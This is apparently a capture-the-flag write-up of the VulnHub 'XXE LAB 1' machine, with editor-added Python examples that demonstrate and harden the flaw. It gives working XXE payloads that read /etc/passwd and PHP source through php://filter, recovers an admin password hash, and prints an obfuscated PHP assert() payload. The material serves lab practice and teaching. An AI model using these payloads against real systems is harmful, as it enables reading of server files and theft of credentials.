VulnHub XXE LAB 1 – by ch4ngeba

Target information

Address: https://www.vulnhub.com/entry/xxe-lab-1,254/
Release date: 8 August 2018
Goal: obtain the flag
Runs on: VMware Workstation 16.x Pro (NAT networking by default)
Description:
The Haboob team built this VM to accompany their published paper "XML External Entity Injection - Explanation and Exploitation" (https://www.exploit-db.com/docs/45374), so that the vulnerability can be exploited inside a private network. We hope you enjoy the challenge!
The challenge lives at: http://ip-address/xxe

Preface

Run under VMware Workstation 16.x Pro in NAT network mode. If anything in the write-up is wrong, corrections are welcome.

I. Information gathering

1. Find the target's IP

nmap -sP 10.1.0.0/24

(-sP is the old spelling of nmap's -sn ping sweep; both still work.) The target answers at 10.1.0.10.

2. Open ports and services

nmap -sC -sV -p- 10.1.0.10

Ports 80 and 5355 are open. On port 80 the default NSE scripts report two entries, /xxe/* and /admin.php, and the banner identifies the server as Apache/2.4.27.

3. Browse to the IP

The site root is the default Apache page.

http://10.1.0.10/xxe/ shows a login form.

http://10.1.0.10/xxe/admin.php is a second login page.

II. Vulnerability detection

1. http://10.1.0.10/xxe/

Submit any username and password and intercept the login request.

The request body is XML rather than a form-encoded POST, so the server parses client-supplied XML on the back end. That is the precondition for XXE and makes it the first thing to test; whether external entities are actually resolved is confirmed in the next step.

2. XXE file read

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root><name>&xxe;</name><password>admin</password></root>

The contents of /etc/passwd come back in the response in place of the name field, so the parser follows SYSTEM identifiers.
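Step 2 above is the whole vulnerability in one request, so here is an added example (written for this edit, not code from the lab or from the write-up) that does both halves of it offline in Python: build_xxe_payload produces the same login XML with a chosen SYSTEM identifier, switching to the php://filter form used later for PHP sources, and parse_login plays the server, parsing that XML with Python's xml.sax once with external general entities resolved, which is the misconfiguration the lab's PHP endpoint has, and once with the hardened default. The target file is a constructed stand-in written to a temporary path, not the lab's /etc/passwd; the element names root, name and password are the ones seen in the intercepted request.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed stand-in for the target's /etc/passwd (not the lab's real file).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)


def build_xxe_payload(resource, password="admin"):
    """Return the lab's login XML with an external entity in <name>.

    PHP source is fetched through php://filter as base64 so that "<?php"
    never enters the document as markup; absolute paths use file://; anything
    else is passed through as a URL (e.g. http://... for out-of-band tests).
    """
    if resource.endswith(".php"):
        system_id = "php://filter/read=convert.base64-encode/resource=" + resource
    elif resource.startswith("/"):
        system_id = "file://" + resource
    else:
        system_id = resource
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE root [\n"
        '<!ENTITY xxe SYSTEM "%s">]>\n'
        "<root><name>&xxe;</name><password>%s</password></root>"
    ) % (system_id, password)


class _FieldCollector(ContentHandler):
    """Collect each element's text the way a naive login handler would."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        # Text expanded from an external entity arrives here like any other
        # character data, which is exactly why the file contents leak.
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_login(xml_text, resolve_external_entities):
    """Parse the login XML and return {element: text}.

    resolve_external_entities=True reproduces the lab's misconfiguration
    (entity loading on); False is xml.sax's hardened default.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _FieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.fields


def run_demo():
    """Write the sample file, then parse the attack XML with both settings.

    Returns (text leaked with entities resolved, text with entities off).
    """
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_PASSWD)
    try:
        payload = build_xxe_payload(path)
        leaked = parse_login(payload, resolve_external_entities=True)["name"]
        hardened = parse_login(payload, resolve_external_entities=False)["name"]
    finally:
        os.unlink(path)
    return leaked, hardened


if __name__ == "__main__":
    leaked, hardened = run_demo()
    print("entities resolved :", repr(leaked))
    print("entities disabled :", repr(hardened))
```

Run it and the first line shows the file contents inside name, the second an empty string: same document, and the only difference is whether the parser is allowed to follow SYSTEM identifiers. In PHP the corresponding switch is LIBXML_NOENT on the load call (plus the now-deprecated libxml_disable_entity_loader()); the lab's own parsing code is not shown on this page, so that side is not reproduced here.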

III. Exploitation

1. Read admin.php

Reading a .php file through a plain file:// entity would drop its <?php ... ?> tags, quotes and angle brackets into the XML document, which makes the expanded entity ill-formed and aborts the parse. PHP's php://filter stream wrapper with convert.base64-encode returns the source as base64 text instead, which is safe inside an element:

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">]><root><name>&xxe;</name><password>admin</password></root>

The response contains the source as base64. Decoding it reveals the admin username and the MD5 of the password:

administhebest

e6e061838856bf47e1de730719fb2609

MD5 is a hash, not an encoding, so the value is looked up rather than decoded: an online table returns the plaintext admin@123.

Site: https://pmd5.com/

Note the loose == comparison against the hash in the source below. PHP's type juggling only helps an attacker when both sides look like numbers in scientific notation (a hash starting with 0e followed only by digits); this hash does not, so the password genuinely has to be cracked.

<?php
  $msg = '';
  if (isset($_POST['login']) && !empty($_POST['username'])
     && !empty($_POST['password'])) {

     if ($_POST['username'] == 'administhebest' &&
        md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
        $_SESSION['valid'] = true;
        $_SESSION['timeout'] = time();
        $_SESSION['username'] = 'administhebest';

      echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
     }else {
        $msg = 'Maybe Later';
     }
  }
?>

2. Log in

Log in with administhebest / admin@123. The page confirms the credentials and shows the Flag link, but clicking it returns a 404.

Viewing the page source, the link target is flagmeout.php. The href is site-absolute (/flagmeout.php) while the file itself sits in the challenge directory, which is why the link is dead but the file can still be read relative to the XXE endpoint in the next step.

3. Read flagmeout.php through the xxe.php endpoint

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">]><root><name>&xxe;</name><password>admin</password></root>

Base64-decoding the returned content gives:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

The token uses only the letters A-Z and the digits 2-7, which is the base32 alphabet. Base32-decoding JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 gives

L2V0Yy8uZmxhZy5waHA=

and base64-decoding that gives a path:

/etc/.flag.php
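Both decoding steps on this page, the base64 of admin.php in step 1 and the base32-then-base64 chain hidden in flagmeout.php, follow the same pattern, so here is one added example (mine, not the author's) that automates them: extract_php_source pulls the longest base64 run out of a response body and decodes it, extract_hint lifts the token out of the HTML comment, and peel keeps stripping base32 or base64 layers while the output is still printable text. The response body is a constructed sample that encodes a two-line stand-in, not the lab's admin.php; the flagmeout.php string is the one recovered above; the stop condition (printable ASCII) is an assumption that fits this lab but would need relaxing for binary or UTF-8 payloads.

```python
import base64
import binascii
import re
import string

# Constructed sample of a response from the XXE endpoint when the entity is
# php://filter/read=convert.base64-encode/resource=...: the base64 is echoed
# back inside the page. This blob encodes the two-line stand-in
# "<?php\necho 1;\n", not the lab's admin.php.
SAMPLE_RESPONSE = "<p>Maybe Later</p><p>Hello PD9waHAKZWNobyAxOwo=, welcome</p>"

# flagmeout.php exactly as recovered above.
FLAGMEOUT_PHP = (
    "<?php\n"
    '$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";\n'
    "echo $flag;\n"
    "?>"
)

_PRINTABLE = set(string.printable)


def _as_text(data):
    """Return data as str if it is printable ASCII, else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    if text and all(c in _PRINTABLE for c in text):
        return text
    return None


def _decode(decoder, token):
    """Apply a base64/base32 decoder, treating padding/alphabet errors as 'not this encoding'."""
    try:
        return _as_text(decoder(token))
    except (binascii.Error, ValueError):
        return None


def extract_php_source(response, min_len=16):
    """Decode the longest base64 run found in a response body."""
    runs = re.findall(r"[A-Za-z0-9+/]{%d,}={0,2}" % min_len, response)
    for run in sorted(runs, key=len, reverse=True):
        text = _decode(base64.b64decode, run)
        if text is not None:
            return text
    raise ValueError("no decodable base64 run in response")


def extract_hint(php_source):
    """The hint sits in an HTML comment of the form <!-- ... (TOKEN) ... -->."""
    m = re.search(r"<!--.*?\(([A-Za-z0-9+/=]+)\).*?-->", php_source)
    if m is None:
        raise ValueError("no (TOKEN) inside an HTML comment")
    return m.group(1)


def peel(token, max_layers=8):
    """Strip base32/base64 layers until the result stops decoding to
    printable text. Returns the full chain, innermost value last."""
    chain = [token.strip()]
    for _ in range(max_layers):
        current = chain[-1]
        decoded = None
        # Only A-Z and 2-7 (plus '=' padding) in 8-character groups: base32.
        # Tried first because a valid base32 string also passes the base64 check.
        if re.fullmatch(r"[A-Z2-7]+=*", current) and len(current) % 8 == 0:
            decoded = _decode(base64.b32decode, current)
        # Otherwise the base64 alphabet in 4-character groups.
        if decoded is None and re.fullmatch(r"[A-Za-z0-9+/]+=*", current) and len(current) % 4 == 0:
            decoded = _decode(base64.b64decode, current)
        if decoded is None or decoded == current:
            break
        chain.append(decoded)
    return chain


if __name__ == "__main__":
    print(extract_php_source(SAMPLE_RESPONSE))
    for layer in peel(extract_hint(FLAGMEOUT_PHP)):
        print(layer)
```

peel returns the whole chain rather than only the last value so the intermediate base64 string can be checked against what the online decoders showed; on the page's token it stops at the path because "/etc/.flag.php" contains characters outside both alphabets.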

4. Read the flag

<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///etc/.flag.php">]>
<root><name>&xxe;</name><password>admin</password></root>

The response contains:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);

This is a PHP payload obfuscated with non-alphanumeric characters. To run it, wrap it in <?php ?> and save it to a file; the PHP version must not be too new, I got an error with 7.2.

How it works, so the result can be checked without trusting the execution: $_[]=$_._ casts the array to the string "Array" and appends the undefined constant _, which old PHP silently treats as the string "_" (PHP 8 throws an Error for an undefined constant, which is one reason recent versions fail). Incrementing single letters taken from "Array_" spells "AssErt", stored in $__, and the accented variables $À to $É are counted up to the digits 0 to 7. The final statement is therefore assert('$_="\123\101\106\103\123\120\173..."'), an assignment of the flag written as octal escapes, followed by assert($_). String arguments to assert() are evaluated as code on PHP 5 and 7.0/7.1, deprecated from 7.2 and removed in 8.0, which is the other reason the version matters.

<?php
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
?>
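Executing a blob that hands attacker-chosen strings to assert() is the wrong tool for reading a flag, and as the write-up shows it is PHP-version sensitive. The added example below (mine, not the page's) decodes the file statically instead, following the trace given above: it finds the block where one variable is set to 0 and a group of variables to 1, counts the $X++; statements to get each variable's digit, then parses the assert() argument into groups of an escape prefix plus three octal digits. The prefix variable ($___) is assumed to be the backslash that the source derives with the XOR, rather than recomputed; FLAG_PHP is the page's /etc/.flag.php with its typographic quotes straightened.

```python
import re

# /etc/.flag.php as read through the XXE above (quotes straightened; the page's
# copy had typographic quotes). No PHP is executed anywhere in this script.
FLAG_PHP = r"""$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);"""

# A PHP variable name in this payload: any run of characters up to the next
# operator. Written as a negated class so accented names work even if the
# accents were stored as combining characters.
_NAME = r"[^$=.;+\[\]()'\"^\s]+"


def decode_nonalpha_php(src):
    """Statically recover the string this obfuscation family builds.

    Layout relied on: `$Z=+_;` sets one variable to 0, `$A=$B=...=++$A[];`
    sets a group to 1, each later `$X++;` adds one, and the assert() argument
    is `'$_="'` followed by groups of <prefix>.<d1>.<d2>.<d3>, each group one
    octal escape. The prefix is assumed to be the backslash (in the lab file
    it is derived as "l" ^ "0" == "\\"); it is not recomputed here.
    """
    block = re.search(r"\$(%s)=\+_;((?:\$%s=)+)\+\+\$%s\[\];" % (_NAME, _NAME, _NAME), src)
    if block is None:
        raise ValueError("digit-variable block not found")
    digits = {block.group(1): 0}
    for name in re.findall(r"\$(%s)=" % _NAME, block.group(2)):
        digits[name] = 1
    tail = src[block.end():]
    for name in digits:
        # Every `$X++;` after the block bumps that variable by one.
        digits[name] += len(re.findall(r"\$%s\+\+;" % re.escape(name), tail))

    call = re.search(r"'\$_=\"'\.(.+?)\.'\"'", src)
    if call is None:
        raise ValueError("assert() string argument not found")
    tokens = [t.lstrip("$") for t in call.group(1).split(".")]
    if len(tokens) % 4:
        raise ValueError("expected groups of prefix + three octal digits")

    out = []
    for i in range(0, len(tokens), 4):
        prefix, octal = tokens[i], tokens[i + 1:i + 4]
        if prefix in digits or any(d not in digits for d in octal):
            raise ValueError("unexpected token layout in group %d" % (i // 4))
        out.append(chr(int("".join(str(digits[d]) for d in octal), 8)))
    return "".join(out)


if __name__ == "__main__":
    print(decode_nonalpha_php(FLAG_PHP))
```

The digit map the script builds is $À=0, $Á=1, $Â=2, $Ã=3, $Ä=4, $Æ=5, $È=6, $É=7; $Ê and $Ë are also incremented but never referenced, since octal digits stop at 7. Decoding the 22 groups gives the flag without running a line of PHP.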

Running it gives the flag:

SAFCSP{xxe_is_so_easy}

Summary

The simplest kind of XXE: the entity's content is reflected straight back in the response (in-band), and PHP's php://filter wrapper turns source files into base64 so that they survive the XML parse.

Source: freebuf.com, 2021-04-01 21:10:37, by ch4ngeba
